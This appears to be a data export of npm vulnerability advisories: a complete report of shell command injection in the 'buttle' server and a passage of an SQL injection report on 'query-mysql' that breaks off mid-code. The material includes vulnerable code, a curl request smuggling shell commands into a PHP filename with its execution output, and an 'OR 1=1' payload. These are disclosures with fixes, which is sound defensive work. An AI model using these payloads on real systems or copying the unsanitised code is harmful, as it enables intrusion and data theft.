&lt;strong&gt;npm page:&lt;/strong&gt; &lt;a title="https://www.npmjs.com/package/buttle" href="/redirect?signature=c494be4b25443a8a51deacb6d7f9f2b218f69c65&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2Fbuttle" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://www.npmjs.com/package/buttle&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2 id="module-description"&gt;Module Description&lt;/h2&gt;
&lt;p&gt;Simple static file (+ markdown) server.&lt;/p&gt;
&lt;h2 id="module-stats"&gt;Module Stats&lt;/h2&gt;
&lt;p&gt;Stats:&lt;/p&gt;
&lt;p&gt;N/A, estimated ~20-40 downloads/week&lt;/p&gt;
&lt;h1 id="vulnerability"&gt;Vulnerability&lt;/h1&gt;
&lt;h2 id="vulnerability-description"&gt;Vulnerability Description&lt;/h2&gt;
&lt;p&gt;When buttle is run with &lt;code&gt;--php-bin&lt;/code&gt; option (to handle PHP), the PHP filename is not sanitized and allows to inject shell commands. This is possible due to this code:&lt;/p&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// ./node_modules/buttle/lib/mid-php.js, line 15&lt;/span&gt;
    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;phpFile&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;norm&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;docroot&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;url&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
    &lt;span class="nx"&gt;fs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;exists&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;phpFile&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;exists&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;exists&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;setHeader&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Content-Type&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;text/html&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;cp&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;child_process&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;spawn&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;phpBin&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;phpFile&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
        &lt;span class="nx"&gt;cp&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;stdout&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;on&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;data&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;data&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;});&lt;/span&gt;
        &lt;span class="nx"&gt;cp&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;on&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;data&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;data&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;});&lt;/span&gt;
        &lt;span class="nx"&gt;cp&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;on&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;close&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;end&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;});&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As you can notice, &lt;code&gt;spawn()&lt;/code&gt; method is called with PHP file as an argument, but no sanitization is apllied on &lt;code&gt;phpFile&lt;/code&gt; variable. Using &lt;code&gt;curl&lt;/code&gt;, I was able to pass example PHP filename concatenated with &lt;code&gt;;[shell cmd]&lt;/code&gt; string, which allows me to execute command on the server.&lt;/p&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;install &lt;code&gt;buttle&lt;/code&gt;:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ npm i buttle
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;create &lt;code&gt;test.php&lt;/code&gt; file with folloing content:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt;
&lt;span class="k"&gt;echo&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;Its working!&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;run buttle with PHP support:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ ./node_modules/buttle/bin/buttle -p 8080 --php-bin /usr/bin/php
Listening on port 8080
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;execute following command in the console:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ curl -v --path-as-is http://localhost:8080/test.php;whoami;uname -a;pwd;echo &amp;quot;uh oh, RCE :P&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;see response from the server containing results of execution of injected commands:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;*   Trying ::1...
* Connected to localhost (::1) port 8080 (#0)
&amp;gt; GET /test.php HTTP/1.1
&amp;gt; Host: localhost:8080
&amp;gt; User-Agent: curl/7.47.0
&amp;gt; Accept: */*
&amp;gt; 
&amp;lt; HTTP/1.1 200 OK
&amp;lt; Content-Type: text/html
&amp;lt; Date: Thu, 29 Mar 2018 10:35:22 GMT
&amp;lt; Connection: keep-alive
&amp;lt; Transfer-Encoding: chunked
&amp;lt; 
* Connection #0 to host localhost left intact
Its working!rafal.janicki
Linux LT0081U2 4.4.0-87-generic #110-Ubuntu SMP Tue Jul 18 12:55:35 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
/home/rafal.janicki/playground/hackerone/Node
uh oh, RCE :P
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="patch"&gt;Patch&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;phpFile&lt;/code&gt; variable should be sanitized. Ideally, it should strip everything what comes after &lt;code&gt;.php&lt;/code&gt; extension in filename and do not allow to use any Bash special characters (like semicolon, pipe, comma etc.)&lt;/p&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Operating system: Ubuntu 16.04&lt;/li&gt;
&lt;li&gt;Node.js 8.9.4&lt;/li&gt;
&lt;li&gt;npm v. 5.6.0&lt;/li&gt;
&lt;li&gt;curl v. 7.47.0&lt;/li&gt;
&lt;/ul&gt;
&lt;h1 id="wrap-up"&gt;Wrap up&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;I contacted the maintainer to let them know: [N] &lt;/li&gt;
&lt;li&gt;I opened an issue in the related repository: [N] &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I hope my report will help to keep Node.js ecosystem and its users safe :)&lt;/p&gt;
&lt;p&gt;Regards,&lt;/p&gt;
&lt;p&gt;Rafal &amp;#39;bl4de&amp;#39; Janicki&lt;/p&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;An attacker is able to execute commands on remote server where buttler with --php-bin flag is run.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-03-29T10:43:09.761Z</t>
  </si>
  <si>
    <t>2018-05-11T15:52:15.524Z</t>
  </si>
  <si>
    <t>When buttle is run with --php-bin option (to handle PHP), the PHP filename is not sanitized and allows to inject shell commands. This is possible due to this code:</t>
  </si>
  <si>
    <t>An attacker is able to execute commands on remote server where buttler with --php-bin flag is run.</t>
  </si>
  <si>
    <t xml:space="preserve">report Remote Code Execution buttle module.  When buttle run   php bin option (to handle PHP), PHP filename not sanitized allows inject shell commands.  Module  module name  buttle version  0.2.0 npm page  https //www.npmjs.com/package/buttle  Module Description  Simple static file (+ markdown) server.  Module Stats  Stats   N/A, estimated ~20 40 downloads/week  Vulnerability  Vulnerability Description  When buttle run   php bin option (to handle PHP), PHP filename not sanitized allows inject shell commands. possible due code  // ./node_modules/buttle/lib/mid php.js, line 15      var phpFile = norm(join(docroot, req.url));     fs.exists(phpFile, function(exists) {     if(exists) {         res.setHeader("Content Type", "text/html");          var cp = require("child_process").spawn(phpBin, [phpFile]);          cp.stdout.on("data", function(data) {         res.write(data);         });          cp.stderr.on("data", function(data) {         res.write(data);         });          cp.on("close", function() {         res.end("");         });      } else {  notice, spawn() method called PHP file argument, no sanitization apllied phpFile variable. Using curl, able pass example PHP filename concatenated ;[shell cmd] string, allows execute command server.  Steps Reproduce    install buttle   $ npm buttle   create file folloing content       run buttle PHP support   $ ./node_modules/buttle/bin/buttle  p 8080   php bin /usr/bin/php Listening port 8080   execute following command console   $ curl  v   path http //localhost 8080/test.php;whoami;uname  a;pwd;echo Â« Â»uh oh, RCE  PÂ« Â»   response server containing results execution injected commands   *   Trying   1... * Connected localhost (  1) port 8080 (#0)   /test.php HTTP/1.1   Host  localhost 8080   User Agent  curl/7.47.0   Accept  */*    &lt; HTTP/1.1 200 OK &lt; Content Type  text/html &lt; Date  Thu, 29 Mar 2018 10 35 22 GMT &lt; Connection  keep alive &lt; Transfer Encoding  chunked &lt;  * Connection #0 host localhost left intact Its working Linux LT0081U2 4.4.0 87 generic #110 Ubuntu SMP Tue Jul 18 12 55 35 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux /home/rafal.janicki/playground/hackerone/Node uh oh, RCE  P  Patch  phpFile variable sanitized. Ideally, strip everything comes .php extension filename not allow use Bash special characters (like semicolon, pipe, comma etc.)  Supporting Material/References    Operating system  Ubuntu 16.04 8.9.4 npm v. 5.6.0 curl v. 7.47.0   Wrap   contacted maintainer let know  [N]  opened issue related repository  [N]    hope report will help keep ecosystem its users safe  )  Regards,  Rafal "bl4de" Janicki  Impact  attacker able execute commands remote server buttler   php bin flag run. </t>
  </si>
  <si>
    <t>attacker able execute commands remote server buttler --php-bin flag run.</t>
  </si>
  <si>
    <t>[query-mysql] SQL Injection due to lack of user input sanitization allows to run arbitrary SQL queries when fetching data from database</t>
  </si>
  <si>
    <t>/advisories/666</t>
  </si>
  <si>
    <t>2018-05-16T19:54:55.336+00:00</t>
  </si>
  <si>
    <t>query-mysql</t>
  </si>
  <si>
    <t>https://www.npmjs.com/query-mysql</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/311244.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi Guys,&lt;/p&gt;
&lt;p&gt;There is SQL Injection in query-mysql module. Due to lack of sanitization of user input, an attacker is able to craft SQL query and get any data from the database.&lt;/p&gt;
&lt;h2 id="module"&gt;Module&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;query-mysql&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Install this module in your project like dependency&lt;/p&gt;
&lt;p&gt;&lt;a title="https://www.npmjs.com/package/query-mysql" href="/redirect?signature=3bb8b6fc74d609f39fce9c2a40aa4efa3620ac90&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2Fquery-mysql" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://www.npmjs.com/package/query-mysql&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;version: 0.0.2&lt;/p&gt;
&lt;p&gt;Stats&lt;br&gt;
0 downloads in the last day&lt;br&gt;
13 downloads in the last week&lt;br&gt;
85 downloads in the last month&lt;/p&gt;
&lt;p&gt;~1000 estimated downloads per year&lt;/p&gt;
&lt;h2 id="description"&gt;Description&lt;/h2&gt;
&lt;p&gt;Most of functions in &lt;code&gt;query-mysql&lt;/code&gt; module used to manipulate data build query usign simple string concatenation. This leads to SQL Injection vulnerability, because an attacker is able to pass his own query and run any SQL on the database.&lt;/p&gt;
&lt;p&gt;This is one of those functions, which allows to select record from the table depends on value for the column:&lt;/p&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// node_modules/query-mysql/lib/base.js, line 172&lt;/span&gt;
    &lt;span class="nl"&gt;fetchById&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;table&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;name_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;callback&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nx"&gt;connect&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;connected&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;connected&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="nx"&gt;connection&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;query&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;SELECT * FROM &amp;quot;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;table&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot; WHERE &amp;quot;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="nx"&gt;name_id&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;=&amp;#39;&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;id&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;#39;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;rows&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;fields&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                    &lt;span class="nx"&gt;connection&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;end&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
                    &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;fetchById&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
                    &lt;span class="c1"&gt;//if (err) throw err;&lt;/span&gt;
                    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                        &lt;span class="nx"&gt;callback&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;error&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kc"&gt;null&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
                    &lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;                      
                        &lt;span class="nx"&gt;callback&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;success&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;rows&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
                    &lt;span class="p"&gt;};&lt;/span&gt;
                &lt;span class="p"&gt;})&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="nx"&gt;callback&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;error_connection&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kc"&gt;null&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;};&lt;/span&gt;
        &lt;span class="p"&gt;})&lt;/span&gt;
    &lt;span class="p"&gt;},&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The query itself is simple string with values passed by the user concatenated with SQL:&lt;/p&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="nx"&gt;connection&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;query&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;SELECT * FROM &amp;quot;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;table&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot; WHERE &amp;quot;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="nx"&gt;name_id&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;=&amp;#39;&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;id&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;#39;&amp;quot;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If we assume, that &lt;code&gt;table&lt;/code&gt;, &lt;code&gt;name_id&lt;/code&gt; and &lt;code&gt;id&lt;/code&gt; will be passed as, respectively, &lt;code&gt;users&lt;/code&gt;, &lt;code&gt;id&lt;/code&gt; and &lt;code&gt;1&lt;/code&gt;, we should get following query:&lt;/p&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;users&lt;/span&gt; &lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;id&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;1&amp;#39;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It returns record from table &lt;code&gt;users&lt;/code&gt;, where &lt;code&gt;id&lt;/code&gt; equals 1.&lt;/p&gt;
&lt;p&gt;Now, if we pass in &lt;code&gt;id&lt;/code&gt; malicious query, like &lt;code&gt;1\&amp;#39; OR 1=1--&lt;/code&gt; - we get this:&lt;/p&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;users&lt;/span&gt; &lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;id&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;1&amp;#39;&lt;/span&gt; &lt;span class="k"&gt;OR&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="c1"&gt;-- &lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This query returns &lt;strong&gt;all&lt;/strong&gt; records from table &lt;code&gt;users&lt;/code&gt;&lt;/p&gt;
&lt;h2 id="mitigation"&gt;Mitigation&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;query-mysql&lt;/code&gt; relies on &lt;code&gt;mysql&lt;/code&gt; module. This module allows to use Preparing Queries (Prepared Statements) - &lt;a title="https://www.npmjs.com/package/mysql#preparing-queries:" href="/redirect?signature=deb96dc83b4c4f41336587b46c0eaed9745e6441&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2Fmysql%23preparing-queries%3A" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://www.npmjs.com/package/mysql#preparing-queries:&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;You can use mysql.format to prepare a query with multiple insertion points, utilizing the proper escaping for ids and values. A simple example of this follows:
var sql = &amp;quot;SELECT * FROM ?? WHERE ?? = ?&amp;quot;;
var inserts = [&amp;#39;users&amp;#39;, &amp;#39;id&amp;#39;, userId];
sql = mysql.format(sql, inserts);
Following this you then have a valid, escaped query that you can then send to the database safely. This is useful if you are looking to prepare the query before actually sending it to the database. As 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is the simplest way to avoid simple SQL Injection vulnerabilites.&lt;/p&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;install &lt;code&gt;query-mysql&lt;/code&gt; module:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ npm install query-mysql
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;log in to your local MySQL instance and create database &lt;code&gt;test&lt;/code&gt; using following SQL:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="c1"&gt;-- Table structure for table `users`&lt;/span&gt;
&lt;span class="k"&gt;DROP&lt;/span&gt; &lt;span class="k"&gt;TABLE&lt;/span&gt; &lt;span class="n"&gt;IF&lt;/span&gt; &lt;span class="k"&gt;EXISTS&lt;/span&gt; &lt;span class="nv"&gt;`users`&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="cm"&gt;/*!40101 SET [@saved_cs_client](/saved_cs_client)     = @@character_set_client */&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="cm"&gt;/*!40101 SET character_set_client = utf8 */&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;TABLE&lt;/span&gt; &lt;span class="nv"&gt;`users`&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;
  &lt;span class="nv"&gt;`username`&lt;/span&gt; &lt;span class="n"&gt;varchar&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;50&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;DEFAULT&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="nv"&gt;`password`&lt;/span&gt; &lt;span class="n"&gt;varchar&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;50&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;DEFAULT&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;ENGINE&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;InnoDB&lt;/span&gt; &lt;span class="k"&gt;DEFAULT&lt;/span&gt; &lt;span class="n"&gt;CHARSET&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;utf8&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;populate data by adding couple of records:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mysql&amp;gt; select * from users;
+----------+----------+
| username | password |
+----------+----------+
| admin    | admin    |
| user     | user     |
| noob     | noob     |
+----------+----------+
3 rows in set (0.00 sec)
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;create sample application:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// app.js&lt;/span&gt;
&lt;span class="s1"&gt;&amp;#39;use strict&amp;#39;&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;query&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;query-mysql&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
